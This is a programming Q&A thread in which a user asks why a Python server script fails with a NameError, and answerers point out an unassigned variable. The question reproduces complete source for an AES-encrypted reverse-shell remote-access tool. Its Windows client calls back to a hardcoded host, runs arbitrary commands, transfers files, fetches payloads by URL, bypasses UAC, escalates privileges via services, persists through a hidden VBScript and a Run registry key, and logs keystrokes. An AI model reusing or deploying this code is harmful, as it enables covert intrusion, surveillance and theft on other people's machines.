# Python Script Name Not Defined

Tags: python, shell, remote-access, remote-debugging, remote-server

I am very new to Python. I was following a [simple Python tutorial](http://www.technicdynamic.com/?p=884), but don't get the expected results.

After running the compiled executable on the client, the client shows up on my server. However, when I choose the client number (1), the python script is immediately exited and I get the following error when run on a remote Linux server:

---

```
Activating client: ('172.51.8.204', 18268)

Traceback (most recent call last):
  File "xmulti_aeserver.py", line 207, in <module>
    if nextcmd.startswith("download ") == True:
NameError: name 'nextcmd' is not defined
```

When run locally on a Windows server, the script does not exit, but the server disconnects the client as such:

```
Activating client: ('192.168.1.104', 26042)

Client disconnected... ('192.168.1.104', 26042)
```

---

I've been reading about name errors everywhere, and I can't see anything wrong with the code I'm using.

Here is my server code (xmulti_aeserver.py):

```
#!/usr/bin/env python

from Crypto.Cipher import AES
import socket, base64, os, time, sys, select
from Crypto import Random

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))

# generate a random secret key
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"
iv = Random.new().read(16)

# clear function
##################################
# Windows ---------------> cls
# Linux   ---------------> clear
if os.name == 'posix': clf = 'clear'
if os.name == 'nt': clf = 'cls'
clear = lambda: os.system(clf)

# initialize socket
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
c.bind(('0.0.0.0', 443))
c.listen(128)

# client information
active = False
clients = []
socks = []
interval = 0.8

# Functions
###########

# send data
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
    sock.sendall(EncodeAES(cipher, cmd + end))

# receive data
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
    data = ""
    l = sock.recv(1024)
    while(l):
        decrypted = DecodeAES(cipher, l)
        data += decrypted
        if data.endswith(end) == True:
            break
        else:
            l = sock.recv(1024)
    return data[:-len(end)]

# download file
def download(sock, remote_filename, local_filename=None):
    # check if file exists
    if not local_filename:
        local_filename = remote_filename
    try:
        f = open(local_filename, 'wb')
    except IOError:
        print "Error opening file.\n"
        Send(sock, "cd .")
        return
    # start transfer
    Send(sock, "download "+remote_filename)
    print "Downloading: " + remote_filename + " > " + local_filename
    fileData = Receive(sock)
    f.write(fileData)
    time.sleep(interval)
    f.close()
    time.sleep(interval)

# upload file
def upload(sock, local_filename, remote_filename=None):
    # check if file exists
    if not remote_filename:
        remote_filename = local_filename
    try:
        g = open(local_filename, 'rb')
    except IOError:
        print "Error opening file.\n"
        Send(sock, "cd .")
        return
    # start transfer
    Send(sock, "upload "+remote_filename)
    print 'Uploading: ' + local_filename + " > " + remote_filename
    while True:
        fileData = g.read()
        if not fileData: break
        Send(sock, fileData, "")
    g.close()
    time.sleep(interval)
    Send(sock, "")
    time.sleep(interval)

# refresh clients
def refresh():
    clear()
    print '\nListening for clients...\n'
    if len(clients) > 0:
        for j in range(0,len(clients)):
            print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
    else:
        print "...\n"
    # print exit option
    print "---\n"
    print "[0] Exit \n"
    print "\nPress Ctrl+C to interact with client."


# main loop
while True:
    refresh()
    # listen for clients
    try:
        # set timeout
        c.settimeout(10)

        # accept connection
        try:
            s,a = c.accept()
        except socket.timeout:
            continue

        # add socket
        if (s):
            s.settimeout(None)
            socks += [s]
            clients += [str(a)]

        # display clients
        refresh()

        # sleep
        time.sleep(interval)

    except KeyboardInterrupt:

        # display clients
        refresh()

        # accept selection --- int, 0/1-128
        activate = input("\nEnter option: ")

        # exit
        if activate == 0:
            print '\nExiting...\n'
            for j in range(0,len(socks)):
                socks[j].close()
            sys.exit()

        # subtract 1 (array starts at 0)
        activate -= 1

        # clear screen
        clear()

        # create a cipher object using the random secret
        cipher = AES.new(secret,AES.MODE_CFB, iv)
        print '\nActivating client: ' + clients[activate] + '\n'
        active = True
        Send(socks[activate], 'Activate')

    # interact with client
    while active:
        try:
            # receive data from client
            data = Receive(socks[activate])
        # disconnect client.
        except:
            print '\nClient disconnected... ' + clients[activate]
            # delete client
            socks[activate].close()
            time.sleep(0.8)
            socks.remove(socks[activate])
            clients.remove(clients[activate])
            refresh()
            active = False
            break

        # exit client session
        if data == 'quitted':
            # print message
            print "Exit.\n"
            # remove from arrays
            socks[activate].close()
            socks.remove(socks[activate])
            clients.remove(clients[activate])
            # sleep and refresh
            time.sleep(0.8)
            refresh()
            active = False
            break
        # if data exists
        elif data != '':
            # get next command
            sys.stdout.write(data)
            nextcmd = raw_input()

        # download
        if nextcmd.startswith("download ") == True:
            if len(nextcmd.split(' ')) > 2:
                download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
            else:
                download(socks[activate], nextcmd.split(' ')[1])

        # upload
        elif nextcmd.startswith("upload ") == True:
            if len(nextcmd.split(' ')) > 2:
                upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
            else:
                upload(socks[activate], nextcmd.split(' ')[1])

        # normal command
        elif nextcmd != '':
            Send(socks[activate], nextcmd)

        elif nextcmd == '':
            print 'Think before you type. ;)\n'
```

Here is my client code (xmulti_aeshell.py):

```
#!/usr/bin/python

from Crypto.Cipher import AES
import subprocess, socket, base64, time, os, sys, urllib2, pythoncom, pyHook, logging

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))

# generate a random secret key
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"

# server config
HOST = '192.168.1.104'
PORT = 443

# session controller
active = False

# Functions
###########

# send data function
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
    sock.sendall(EncodeAES(cipher, cmd + end))

# receive data function
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
    data = ""
    l = sock.recv(1024)
    while(l):
        decrypted = DecodeAES(cipher, l)
        data = data + decrypted
        if data.endswith(end) == True:
            break
        else:
            l = sock.recv(1024)
    return data[:-len(end)]

# prompt function
def Prompt(sock, promptmsg):
    Send(sock, promptmsg)
    answer = Receive(sock)
    return answer

# upload file
def Upload(sock, filename):
    bgtr = True
    # file transfer
    try:
        f = open(filename, 'rb')
        while 1:
            fileData = f.read()
            if fileData == '': break
            # begin sending file
            Send(sock, fileData, "")
        f.close()
    except:
        time.sleep(0.1)
    # let server know we're done..
    time.sleep(0.8)
    Send(sock, "")
    time.sleep(0.8)
    return "Finished download."

# download file
def Download(sock, filename):
    # file transfer
    g = open(filename, 'wb')
    # download file
    fileData = Receive(sock)
    time.sleep(0.8)
    g.write(fileData)
    g.close()
    # let server know we're done..
    return "Finished upload."

# download from url (unencrypted)
def Downhttp(sock, url):
    # get filename from url
    filename = url.split('/')[-1].split('#')[0].split('?')[0]
    g = open(filename, 'wb')
    # download file
    u = urllib2.urlopen(url)
    g.write(u.read())
    g.close()
    # let server know we're done...
    return "Finished download."

# privilege escalation
def Privs(sock):

    # Windows/NT Methods
    if os.name == 'nt':

        # get initial info
        privinfo = '\nUsername:        ' + Exec('echo %USERNAME%')
        privinfo += Exec('systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"')

        winversion = Exec('systeminfo')
        windowsnew = -1
        windowsold = -1

        # newer versions of windows go here
        windowsnew += winversion.find('Windows 7')
        windowsnew += winversion.find('Windows 8')
        windowsnew += winversion.find('Windows Vista')
        windowsnew += winversion.find('Windows VistaT')
        windowsnew += winversion.find('Windows Server 2008')

        # older versions go here (only XP)
        windowsold += winversion.find('Windows XP')
        windowsold += winversion.find('Server 2003')

        # if it is, display privs using whoami command.
        if windowsnew > 0:
            privinfo += Exec('whoami /priv') + '\n'

        # check if user is administrator
        admincheck = Exec('net localgroup administrators | find "%USERNAME%"')

        # if user is in the administrator group, attempt service priv. esc. using bypassuac
        if admincheck != '':

            privinfo += 'Administrator privilege detected.\n\n'

            # if windows version is vista or greater, bypassUAC :)
            if windowsnew > 0:

                # prompt for bypassuac location or url
                bypassuac = Prompt(sock, privinfo+'Enter location/url for BypassUAC: ')

                # attempt to download from url
                if bypassuac.startswith("http") == True:
                    try:
                        c = Downhttp(sock, bypassuac)
                        d = os.getcwd() + '\\' + bypassuac.split('/')[-1]
                    except:
                        return "Download failed: invalid url.\n"

                # attempt to open local file
                else:
                    try:
                        c = open(bypassuac)
                        c.close()
                        d = bypassuac
                    except:
                        return "Invalid location for BypassUAC.\n"


            # fetch executable's location
            curdir = os.path.join(sys.path[0], sys.argv[0])

            # add service
            if windowsnew > 0: elvpri = Exec(d + ' elevate /c sc create blah binPath= "cmd.exe /c ' + curdir + '" type= own start= auto')
            if windowsold > 0: elvpri = Exec('sc create blah binPath= "' + curdir + '" type= own start= auto')
            # start service
            if windowsnew > 0: elvpri = Exec(d + ' elevate /c sc start blah')
            if windowsold > 0: elvpri = Exec('sc start blah')
            # finished.
            return "\nPrivilege escalation complete.\n"

        # windows xp doesnt allow wmic commands by defautlt ;(
        if windowsold > 0:
            privinfo += 'Unable to escalate privileges.\n'
            return privinfo

        # attempt to search for weak permissions on applications
        privinfo += 'Searching for weak permissions...\n\n'

        # array for possible matches
        permatch = []
        permatch.append("BUILTIN\Users:(I)(F)")
        permatch.append("BUILTIN\Users:(F)")

        permbool = False

        # stage 1 outputs to text file: p1.txt
        xv = Exec('for /f "tokens=2 delims=\'=\'" %a in (\'wmic service list full^|find /i "pathname"^|find /i /v "system32"\') do @echo %a >> p1.txt')
        # stage 2 outputs to text file: p2.txt
        xv = Exec('for /f eol^=^"^ delims^=^" %a in (p1.txt) do cmd.exe /c icacls "%a" >> p2.txt')

        # give some time to execute commands,
        # 40 sec should do it... ;)
        time.sleep(40)

        # loop from hell to determine a match to permatch array.
        ap = 0
        bp = 0
        dp = open('p2.txt')
        lines = dp.readlines()
        for line in lines:
            cp = 0
            while cp < len(permatch):
                j = line.find(permatch[cp])
                if j != -1:
                    # we found a misconfigured directory :)
                    if permbool == False:
                        privinfo += 'The following directories have write access:\n\n'
                        permbool = True
                    bp = ap
                    while True:
                        if len(lines[bp].split('\\')) > 2:
                            while bp <= ap:
                                privinfo += lines[bp]
                                bp += 1
                            break
                        else:
                            bp -= 1
                cp += 1
            ap += 1
        time.sleep(4)
        if permbool == True: privinfo += '\nReplace executable with Python shell.\n'
        if permbool == False: privinfo += '\nNo directories with misconfigured premissions found.\n'
        # close file
        dp.close()
        # delete stages 1 & 2
        xv = Exec('del p1.txt')
        xv = Exec('del p2.txt')

        return privinfo

# persistence
def Persist(sock, redown=None, newdir=None):

    # Windows/NT Methods
    if os.name == 'nt':

        privscheck = Exec('reg query "HKU\S-1-5-19" | find "error"')

        # if user isn't system, return
        if privscheck != '':
            return "You must be authority\system to enable persistence.\n"
        # otherwise procede
        else:
            # fetch executable's location
            exedir = os.path.join(sys.path[0], sys.argv[0])
            exeown = exedir.split('\\')[-1]

            # get vbscript location
            vbsdir = os.getcwd() + '\\' + 'vbscript.vbs'

            # write VBS script
            if redown == None: vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nWhile state = 1\nexist = ReportFileStatus(wshname)\nIf exist = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nElse\nWshShell.Run """' + exedir + '""",hidden\nwscript.sleep 50000\nEnd If\nvFound = False\nElse\nwscript.sleep 50000\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\n'
            else:
                if newdir == None: 
                    newdir = exedir
                    newexe = exeown
                else: 
                    newexe = newdir.split('\\')[-1]
                vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nurlname = "' + redown + '"\ndirname = "' + newdir + '"\nWhile state = 1\nexist1 = ReportFileStatus(wshname)\nexist2 = ReportFileStatus(dirname)\nIf exist1 = False And exist2 = False then\ndownload urlname, dirname\nEnd If\nIf exist1 = True Or exist2 = True then\nif exist1 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nexist2 = False\nend if\nif exist2 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(dirname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" OR objProcess.name = "' + newexe + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nEnd If\nIf vFound = False then\nIf exist1 = True then\nWshShell.Run """' + exedir + '""",hidden\nEnd If\nIf exist2 = True then\nWshShell.Run """' + dirname + '""",hidden\nEnd If\nwscript.sleep 50000\nEnd If\nvFound = False\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\nfunction download(sFileURL, sLocation)\nSet objXMLHTTP = CreateObject("MSXML2.XMLHTTP")\nobjXMLHTTP.open "GET", sFileURL, false\nobjXMLHTTP.send()\ndo until objXMLHTTP.Status = 200 :  wscript.sleep(1000) :  loop\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject("ADODB.Stream")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject("Scripting.FileSystemObject")\nIf objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile sLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nEnd function\n'

            # open file & write
            vbs = open('vbscript.vbs', 'wb')
            vbs.write(vbscript)
            vbs.close()

            # add registry to startup
            persist = Exec('reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v blah /t REG_SZ /d "' + vbsdir + '"')
            persist += '\nPersistence complete.\n'
            return persist

# execute command
def Exec(cmde):
    # check if command exists
    if cmde:
        execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        cmdoutput = execproc.stdout.read() + execproc.stderr.read()
        return cmdoutput

    # otherwise, return
    else:
        return "Enter a command.\n"

# keylogging function
# version 1, by K.B. Carte
##########################
# enter log filename.
LOG_STATE = True
LOG_FILENAME = 'keylog.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)s')
    logging.log(10,chr(event.Ascii))
    return True     

# main loop
while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))

        # create a cipher object using the random secret
        cipher = AES.new(secret,AES.MODE_CFB, iv)

        # waiting to be activated...
        data = Receive(s)

        # activate.
        if data == 'Activate':
            active = True
            Send(s, "\n"+os.getcwd()+">")

        # interactive loop
        while active:

            # Receive data
            data = Receive(s)

            # think before you type smartass
            if data == '':
                time.sleep(0.02)

            # check for quit
            if data == "quit" or data == "terminate":
                Send(s, "quitted")
                break

            # check for change directory
            elif data.startswith("cd ") == True:
                try:
                    os.chdir(data[3:])
                    stdoutput = ""
                except:
                    stdoutput = "Error opening directory.\n"

            # check for download
            elif data.startswith("download") == True:
                # Upload the file
                stdoutput = Upload(s, data[9:])

            elif data.startswith("downhttp") == True:
                # Download from url
                stdoutput = Downhttp(s, data[9:])

            # check for upload
            elif data.startswith("upload") == True:
                # Download the file
                stdoutput = Download(s, data[7:])

            elif data.startswith("privs") == True:
                # Attempt to elevate privs
                stdoutput = Privs(s)

            elif data.startswith("persist") == True:
                # Attempt persistence
                if len(data.split(' ')) == 1: stdoutput = Persist(s)
                elif len(data.split(' ')) == 2: stdoutput = Persist(s, data.split(' ')[1])
                elif len(data.split(' ')) == 3: stdoutput = Persist(s, data.split(' ')[1], data.split(' ')[2])

            elif data.startswith("keylog") == True:
                # Begin keylogging
                if LOG_STATE == False:
                    try:
                        # set to True
                        LOG_STATE = True
                        hm = pyHook.HookManager()
                        hm.KeyDown = OnKeyboardEvent
                        hm.HookKeyboard()
                        pythoncom.PumpMessages()
                        stdoutput = "Logging keystrokes to: "+LOG_FILENAME+"...\n"
                    except:
                        ctypes.windll.user32.PostQuitMessage(0)
                        # set to False
                        LOG_STATE = False
                        stdoutput = "Keystrokes have been logged to: "+LOG_FILENAME+".\n"


            else:
                # execute command.
                stdoutput = Exec(data)

            # send data
            stdoutput = stdoutput+"\n"+os.getcwd()+">"
            Send(s, stdoutput)

        # loop ends here

        if data == "terminate":
            break
        time.sleep(3)
    except socket.error:
        s.close()
        time.sleep(10)
        continue
```

I would appreciate any pointers.

Comment: In the case `data == ''` (or `not data`), you never assign `nextcmd`. This would be easier with a [minimal example](http://stackoverflow.com/help/mcve); the overwhelming majority of the code is unrelated to the error.

Comment: @jonrsharpe, thanks. When I try defining data = '' before this case, I get the same results. I tried setting data = '1', but that also did not work.

Answer (score 1, accepted):

In `xmulti_aeserver.py` just above:

```
# main loop
while True:
  .....
```

write `nextcmd = ''`. So it will be:

```
nextcmd = ''
# main loop
while True:
  .....
```

This will define the `nextcmd`.

Add to this IF statment:

```
elif data != '':
   # get next command
   sys.stdout.write(data)
   nextcmd = raw_input()    
elif data == '':
   nextcmd = raw_input()
else:
   nextcmd = raw_input()
```

Comment: When I add "nextcmd = None", I am getting the error, "python AttributeError: 'NoneType' object has no attribute 'startswith'". I also tried setting "startswith = None" but get the same error.

Comment: Thanks, but now when I choose the client number (1), the Python script endlessly prints 'Think before you type. ;)\n' until I force the script to exit. On the other hand, when I entirely omit the last two lines of code" elif nextcmd == '':
   print 'Think before you type. ;)\n'", when I choose the client number (1), the Python script freezes on a screen that says "Activating client: ('192.0.0.103', 4153)" until I forcefully exit the script.

Comment: @TechDude Edited it again

Comment: Thanks, now when I choose the client number (1), the Python script freezes on a screen that says "Activating client: ('192.0.0.103', 4153)" until I forcefully exit the script. At the same time, xmulti_aeshell.exe closes on my client machine.

Comment: I basically want to issue commands (updates and other tweaks from time to time) to different client machines (all Windows machines) instead of having to RDP into them each time. I thought this would be straightforward in Python, but I have been struggling to fix this seemingly simple script for the past week. If this isn't as simple as I thought it was, do you have any other suggestions? Thanks.

Comment: Actually, xmulti_aeshell.exe closes on my client machine as soon as it shows up on my server.

Comment: Well my last edit was about the things that where in the comments and answers by others. My answer does fix your answer with not defined nextcmd but if all of that does not work then there is something else wrong in the code. Try making prints in some parts of the code to check what prints out and what not so you will catch the part of the code that freezes.

Comment: Thanks, I will try printing as you mentioned to see if I can pinpoint the source of other problems.

Answer (score 1):

You only define `nextcmd` in one branch of an `if-else` statement:

```
 elif data != '':
    # get next command
    sys.stdout.write(data)
    nextcmd = raw_input()
```

but then assume that it is defined on line 207. You are missing the case where `data` is the empty string, which prevents `nextcmd` from being defined when you try to access it.

Comment: Thanks. When I try defining data = '' before this case, I get the same results. I tried setting data = '1', but that also did not work.

Answer (score 1):

It looks like you have

```
if data == 'quitted':
     ....
elif data != '':
     ....
     nextcmd = raw_input()
```

But if `data==''`, nextcmd is not set to anything, which causes the error when you try and use it.

Comment: Thanks. When I try defining data = '' before this case, I get the same results. I tried setting data = '1', but that also did not work.